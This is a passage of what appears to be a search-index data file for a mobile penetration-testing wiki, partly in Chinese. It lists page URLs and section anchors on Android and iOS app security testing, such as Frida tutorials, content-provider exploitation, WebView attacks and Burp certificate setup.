ertificate","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#nice-avd-options","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#take-a-snapshot","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#references","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#绕过生物识别认证android","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-1--无加密对象使用的绕过","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-2--异常处理方法","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-3--插桩框架","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-4--逆向工程与代码修改","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-5--使用自定义身份验证工具","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-6--针对-biometricprompt-的通用-frida-hookapi-28-34","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-7--降级--回退操控","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-8--供应商--内核级-cve","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#开发人员的加固检查清单快速渗透测试者笔记","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#参考文献","mobile-pentesting/android-app-pentesting/content-protocol.html#列出媒体存储中的文件","mobile-pentesting/android-app-pentesting/content-protocol.html#chrome-对内容提供者的访问","mobile-pentesting/android-app-pentesting/content-protocol.html#chrome-cve-2020-6516-same-origin-policy-bypass","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#drozer-tutorial","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#apks-to-test","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#installation","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#启动服务器","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#有趣的命令","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#包","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#活动","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#服务","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#广播接收器","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#是否可调试","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#教程","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#更多信息","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#exploiting-content-providers","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#intro","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#从--暴露的内容提供者--获取信息","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#数据库支持的内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#查询内容","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#insert-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#update-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#delete-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#sql-injection","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#文件系统支持的内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#读取-文件","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#路径遍历","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#2023-2025-更新与现代技巧","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#drozer-3x-python-3-已发布","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#使用内置的-cmd-content-助手-adb--80","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#最近滥用内容提供者的真实世界cve","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#api-30-的加固检查清单","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#参考文献","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#利用可调试应用程序","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#绕过root和可调试检查","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#使android应用可调试并绕过检查的步骤","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#使应用可调试","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#绕过检查","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#利用漏洞","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#检查漏洞","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#准备设置","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#在运行时注入代码","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#2024--将--任何--应用程序转变为可调试进程-cve-2024-31317","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#快速poc","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#检测与缓解","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#参考文献","mobile-pentesting/android-app-pentesting/flutter.html#flutter","mobile-pentesting/android-app-pentesting/flutter.html#flutter-1","mobile-pentesting/android-app-pentesting/flutter.html#在flutter中拦截https流量","mobile-pentesting/android-app-pentesting/flutter.html#为什么在flutter中拦截https很棘手","mobile-pentesting/android-app-pentesting/flutter.html#确定确切的flutter堆栈","mobile-pentesting/android-app-pentesting/flutter.html#目标-ssl_crypto_x509_session_verify_cert_chain","mobile-pentesting/android-app-pentesting/flutter.html#选项a--使用-reflutter-进行二进制补丁","mobile-pentesting/android-app-pentesting/flutter.html#选项b--使用-frida-进行实时钩取硬核路径","mobile-pentesting/android-app-pentesting/flutter.html#通过代理强制流量","mobile-pentesting/android-app-pentesting/flutter.html#参考","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#frida-教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#安装","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#frida-server-vs-gadget-root-vs-no-root","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#tutorial-1","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#tutorial-2","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#tutorial-3","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#快速示例","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#calling-frida-from-command-line","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#基本-python-脚本","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#hooking-functions-without-parameters","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#对带参数的函数进行-hook-并获取返回值","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#hooking-函数并用我们的输入调用它们","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#获取已创建类的对象","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#其他-frida-教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#参考资料","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#frida-tutorial-1","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#python","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-1---布尔绕过","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-2---函数暴力破解","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#非静态函数","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#静态函数","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-3---检索参数和返回值","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#重要","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#frida-tutorial-2","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#第-2-部分","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#part-3","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python-1","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#js","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#第4部分","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python-2","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#js-1","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#frida-tutorial-3","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-1","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-2","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-3--frida-trace-frida--16","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-4--使用-objection-的单行命令-2024","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#现代-android-备注-2023---2025","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#参考","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#objection-tutorial","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#介绍","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#简介","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#教程","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#安装","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#连接","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#基本操作","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#静态分析变为动态","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#钩住变得简单","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#类实例","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#keystoreintents","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#内存","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#sqlite","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#exit","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#我在-objection-中错过了什么","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#google-ctf-2018---shall-we-play-a-game","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#smali-更改","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#第一次调用-m","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#解决方案","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#不安全的-in-app-update-机制--remote-code-execution-via-malicious-plugins","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#0-quick-triage-does-the-app-have-an-inapp-updater","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#1-识别不安全的-tls-trustmanager","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#2-reverse-engineering-the-update-metadata","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#3-构造恶意插件","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#31-本地库路径-dlopensystemloadlibrary","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#32-dex-based-plugin-path-dexclassloader","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#4-使用-mitmproxy-交付-payload","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#41-绕过签名哈希检查如果存在","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#5-other-attack-surfaces-in-updaters-20232025","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#6-post-exploitation-ideas","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#detection--mitigation-checklist-blue-team","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#references","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#安装-burp-证书","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#通过-adb-设置系统范围代理","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#在虚拟机上","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#using-magisc","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#learn-how-to-create-a-magisc-module","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#post-android-14","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#bind-mounting-通过-nsenter","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#参考资料","mobile-pentesting/android-app-pentesting/intent-injection.html#intent-injection","mobile-pentesting/android-app-pentesting/intent-injection.html#deep-links--webview-sink-url-parameter-injection","mobile-pentesting/android-app-pentesting/intent-injection.html#启用-javascript-的检查顺序错误","mobile-pentesting/android-app-pentesting/intent-injection.html#其他经典的-intent-注入原语","mobile-pentesting/android-app-pentesting/intent-injection.html#参考文献","mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.html#自动","mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.html#手动","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#手动去混淆技术","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#手动--去混淆技术","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#静态去混淆策略","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#识别混淆","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#去混淆中的动态分析","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#动态分析的应用","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#使用-llm-的自动去混淆-androidmeda","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#参考文献和进一步阅读","mobile-pentesting/android-app-pentesting/react-native-application.html#react-native-应用程序分析","mobile-pentesting/android-app-pentesting/react-native-application.html#javascript-代码","mobile-pentesting/android-app-pentesting/react-native-application.html#webpack","mobile-pentesting/android-app-pentesting/react-native-application.html#在包中快速寻找秘密端点","mobile-pentesting/android-app-pentesting/react-native-application.html#更改-js-代码并重建","mobile-pentesting/android-app-pentesting/react-native-application.html#hermes-字节码","mobile-pentesting/android-app-pentesting/react-native-application.html#修改代码并重建-hermes","mobile-pentesting/android-app-pentesting/react-native-application.html#动态分析","mobile-pentesting/android-app-pentesting/react-native-application.html#使用-frida-在发布版本中启用开发支持注意事项","mobile-pentesting/android-app-pentesting/react-native-application.html#rn-应用中的网络拦截","mobile-pentesting/android-app-pentesting/react-native-application.html#流行-rn-库中的近期问题需要注意的事项","mobile-pentesting/android-app-pentesting/react-native-application.html#参考文献","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#反向分析本地库","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#新提取-libfooso-的快速初筛流程","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#动态插桩-frida--16","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#process-local-jni-telemetry-via-preloaded-so-sotap","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#在-apk-中值得寻找的近期漏洞","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#反逆向与加固趋势android-13-15","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#资源","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#参考资料","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#shizuku-privileged-api","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#1-启动特权服务","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#11-无线-adb-android-11","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#12-usb--本地-adb-一行命令","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#13-已获取root权限的设备","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#14-验证它是否正在运行","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#2-从应用程序绑定","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#3-rish--在-termux-中的提升-shell","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#31-有用的-rish-shell-命令","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#4-安全考虑--检测","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#5-缓解措施","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#参考文献","mobile-pentesting/android-app-pentesting/smali-changes.html#smali---反编译修改编译","mobile-pentesting/android-app-pentesting/smali-changes.html#快速方法","mobile-pentesting/android-app-pentesting/smali-changes.html#反编译-apk","mobile-pentesting/android-app-pentesting/smali-changes.html#更改-smali-代码","mobile-pentesting/android-app-pentesting/smali-changes.html#重新编译-apk","mobile-pentesting/android-app-pentesting/smali-changes.html#为新的-apk-签名","mobile-pentesting/android-app-pentesting/smali-changes.html#优化新应用","mobile-pentesting/android-app-pentesting/smali-changes.html#为新的-apk-重新签名又一次","mobile-pentesting/android-app-pentesting/smali-changes.html#修改-smali","mobile-pentesting/android-app-pentesting/smali-changes.html#轻微更改","mobile-pentesting/android-app-pentesting/smali-changes.html#修改函数内变量的初始值","mobile-pentesting/android-app-pentesting/smali-changes.html#基本操作","mobile-pentesting/android-app-pentesting/smali-changes.html#更大的改动","mobile-pentesting/android-app-pentesting/smali-changes.html#日志记录","mobile-pentesting/android-app-pentesting/smali-changes.html#toast-提示","mobile-pentesting/android-app-pentesting/smali-changes.html#在启动时加载本地库-systemloadlibrary","mobile-pentesting/android-app-pentesting/smali-changes.html#参考资料","mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.html#重要说明","mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.html#参考文献","mobile-pentesting/android-app-pentesting/tapjacking.html#tapjacking","mobile-pentesting/android-app-pentesting/tapjacking.html#基本信息","mobile-pentesting/android-app-pentesting/tapjacking.html#检测","mobile-pentesting/android-app-pentesting/tapjacking.html#保护","mobile-pentesting/android-app-pentesting/tapjacking.html#利用","mobile-pentesting/android-app-pentesting/tapjacking.html#tapjacking-exportedactivity","mobile-pentesting/android-app-pentesting/tapjacking.html#floatingwindowapp","mobile-pentesting/android-app-pentesting/tapjacking.html#qark","mobile-pentesting/android-app-pentesting/tapjacking.html#可访问性覆盖钓鱼银行木马变种","mobile-pentesting/android-app-pentesting/tapjacking.html#工作原理","mobile-pentesting/android-app-pentesting/tapjacking.html#银行木马的典型工作流程","mobile-pentesting/android-app-pentesting/tapjacking.html#检测与缓解","mobile-pentesting/android-app-pentesting/tapjacking.html#参考文献","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-攻击","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-配置和安全指南","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-漏洞概述","mobile-pentesting/android-app-pentesting/webview-attacks.html#webviews-中的文件访问","mobile-pentesting/android-app-pentesting/webview-attacks.html#loadurl","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-和-intent-方案处理","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-bridge","mobile-pentesting/android-app-pentesting/webview-attacks.html#基于反射的远程代码执行-rce","mobile-pentesting/android-app-pentesting/webview-attacks.html#远程调试","mobile-pentesting/android-app-pentesting/webview-attacks.html#导出任意文件","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-攻击-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-配置和安全指南-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-漏洞概述-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webviews-中的文件访问-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#loadurl-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#深度链接到内部-webview自定义方案--webview-漏洞","mobile-pentesting/android-app-pentesting/webview-attacks.html#在验证之前启用-javascript检查顺序错误","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-和-intent-方案处理-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-bridge-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#基于反射的远程代码执行-rce-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#远程调试-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#导出任意文件-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#references","mobile-pentesting/ios-pentesting-checklist.html#ios-pentesting-checklist","mobile-pentesting/ios-pentesting-checklist.html#准备","mobile-pentesting/ios-pentesting-checklist.html#数据存储","mobile-pentesting/ios-pentesting-checklist.html#键盘","mobile-pentesting/ios-pentesting-checklist.html#日志","mobile-pentesting/ios-pentesting-checklist.html#备份","mobile-pentesting/ios-pentesting-checklist.html#应用程序内存","mobile-pentesting/ios-pentesting-checklist.html#破损的加密","mobile-pentesting/ios-pentesting-checklist.html#本地身份验证","mobile-pentesting/ios-pentesting-checklist.html#通过-ipc-暴露敏感功能","mobile-pentesting/ios-pentesting-checklist.html#网络通信","mobile-pentesting/ios-pentesting-checklist.html#其他","mobile-pentesting/ios-pentesting/index.html#ios-pentesting","mobile-pentesting/ios-pentesting/index.html#ios-basics","mobile-pentesting/ios-pentesting/index.html#testing-environment","mobile-pentesting/ios-pentesting/index.html#initial-analysis","mobile-pentesting/ios-pentesting/index.html#basic-ios-testing-operations","mobile-pentesting/ios-pentesting/index.html#basic-static-analysis","mobile-pentesting/ios-pentesting/index.html#basic-dynamic-analysis","mobile-pentesting/ios-pentesting/index.html#listing-installed-apps","mobile-pentesting/ios-pentesting/index.html#基本枚举与钩子","mobile-pentesting/ios-pentesting/index.html#ipa结构","mobile-pentesting/ios-pentesting/index.html#二进制逆向","mobile-pentesting/ios-pentesting/index.html#数据存储","mobile-pentesting/ios-pentesting/index.html#plist","mobile-pentesting/ios-pentesting/index.html#core-data","mobile-pentesting/ios-pentesting/index.html#yapdatabase","mobile-pentesting/ios-pentesting/index.html#其他-sqlite-数据库","mobile-pentesting/ios-pentesting/index.html#firebase-实时数据库","mobile-pentesting/ios-pentesting/index.html#realm-数据库","mobile-pentesting/ios-pentesting/index.html#couchbase-lite-数据库","mobile-pentesting/ios-pentesting/index.html#cookies","mobile-pentesting/ios-pentesting/index.html#cache","mobile-pentesting/ios-pentesting/index.html#snapshots","mobile-pentesting/ios-pentesting/index.html#keychain","mobile-pentesting/ios-pentesting/index.html#自定义键盘和键盘缓存","mobile-pentesting/ios-pentesting/index.html#防止文本字段缓存","mobile-pentesting/ios-pentesting/index.html#日志","mobile-pentesting/ios-pentesting/index.html#监控系统日志","mobile-pentesting/ios-pentesting/index.html#备份","mobile-pentesting/ios-pentesting/index.html#安全风险","mobile-pentesting/ios-pentesting/index.html#从备份中排除文件","mobile-pentesting/ios-pentesting/index.html#测试漏洞","mobile-pentesting/ios-pentesting/index.html#修改应用行为","mobile-pentesting/ios-pentesting/index.html#关于敏感数据内存测试的总结","mobile-pentesting/ios-pentesting/index.html#检索和分析内存转储","mobile-pentesting/ios-pentesting/index.html#运行时内存分析","mobile-pentesting/ios-pentesting/index.html#broken-cryptography","mobile-pentesting/ios-pentesting/index.html#poor-key-management-processes","mobile-pentesting/ios-pentesting/index.html#use-of-insecure-andor-deprecated-algorithms","mobile-pentesting/ios-pentesting/index.html#check","mobile-pentesting/ios-pentesting/index.html#本地身份验证","mobile-pentesting/ios-pentesting/index.html#实现本地身份验证","mobile-pentesting/ios-pentesting/index.html#使用钥匙串进行本地身份验证","mobile-pentesting/ios-pentesting/index.html#检测","mobile-pentesting/ios-pentesting/index.html#本地身份验证框架绕过","mobile-pentesting/ios-pentesting/index.html#敏感功能通过-ipc-暴露","mobile-pentesting/ios-pentesting/index.html#自定义-uri-处理程序--深度链接--自定义方案","mobile-pentesting/ios-pentesting/index.html#通用链接","mobile-pentesting/ios-pentesting/index.html#uiactivity-共享","mobile-pentesting/ios-pentesting/index.html#uipasteboard","mobile-pentesting/ios-pentesting/index.html#应用扩展","mobile-pentesting/ios-pentesting/index.html#webviews","mobile-pentesting/ios-pentesting/index.html#序列化和编码","mobile-pentesting/ios-pentesting/index.html#网络通信","mobile-pentesting/ios-pentesting/index.html#主机名检查","mobile-pentesting/ios-pentesting/index.html#证书钉扎","mobile-pentesting/ios-pentesting/index.html#杂项","mobile-pentesting/ios-pentesting/index.html#热补丁强制更新","mobile-pentesting/ios-pentesting/index.html#第三方","mobile-pentesting/ios-pentesting/index.html#有趣的漏洞与案例研究","mobile-pentesting/ios-pentesting/index.html#参考资料与更多资源","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#air-keyboard-remote-input-injection-unauthenticated-tcp--websocket-listener","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#tldr","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#1-service-discovery","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#2-协议细节-ios","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#21--旧版--104--自定义二进制帧","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#22--当前--105--json-over-websocket","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#3-利用-poc","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#31--针对--104-原始-tcp","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#32--目标--105-websocket","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#4-android-companion--denial-of-service","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#5-相关应用--重复出现的反模式","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#6-根本原因","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#7-加固与防御措施","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#检测备忘单渗透测试者","mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.html#参考文献","mobile-pentesting/ios-pentesting/ios-app-extensions.html#ios-app-extensions","mobile-pentesting/ios-pentesting/ios-app-extensions.html#安全考虑","mobile-pentesting/ios-pentesting/ios-app-extensions.html#静态分析","mobile-pentesting/ios-pentesting/ios-app-extensions.html#动态分析","mobile-pentesting/ios-pentesting/ios-app-extensions.html#参考","mobile-pentesting/ios-pentesting/ios-basics.html#权限分离和沙箱","mobile-pentesting/ios-pentesting/ios-basics.html#数据保护","mobile-pentesting/ios-pentesting/ios-basics.html#钥匙串","mobile-pentesting/ios-pentesting/ios-basics.html#钥匙串-api-操作","mobile-pentesting/ios-pentesting/ios-basics.html#配置钥匙串项目数据保护","mobile-pentesting/ios-pentesting/ios-basics.html#越狱设备警告","mobile-pentesting/ios-pentesting/ios-basics.html#钥匙串数据的持久性","mobile-pentesting/ios-pentesting/ios-basics.html#应用程序能力","mobile-pentesting/ios-pentesting/ios-basics.html#设备能力","mobile-pentesting/ios-pentesting/ios-basics.html#权限","mobile-pentesting/ios-pentesting/ios-basics.html#参考文献","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#ios-基本测试操作","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#ios-设备识别和访问总结","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#识别-ios-设备的-udid","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#访问设备-shell","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#重置忘记的密码","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#数据传输技术","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#传输应用数据文件","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#图形用户界面工具","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#使用-objection-进行文件管理","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#获取和提取应用","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#获取ipa文件","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#提取应用程序二进制文件","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#解密过程","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#解密自动","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#安装应用程序","mobile-pentesting/ios-pentesting/basic-ios-testing-operations.html#references","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#ios-burp-suite-配置","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#在-ios-设备上安装-burp-证书","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#使用-burp-mobile-assistant-的自动安装","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#手动安装步骤","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#配置拦截代理","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#针对越狱设备的高级配置","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#完整网络监控嗅探","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#在模拟器中安装-burp-证书","mobile-pentesting/ios-pentesting/burp-configuration-for-ios.html#macos-代理配置","mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.html#ios-custom-uri-handlers--deeplinks--custom-schemes","mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.html#基本信息","mobile-pentesting/i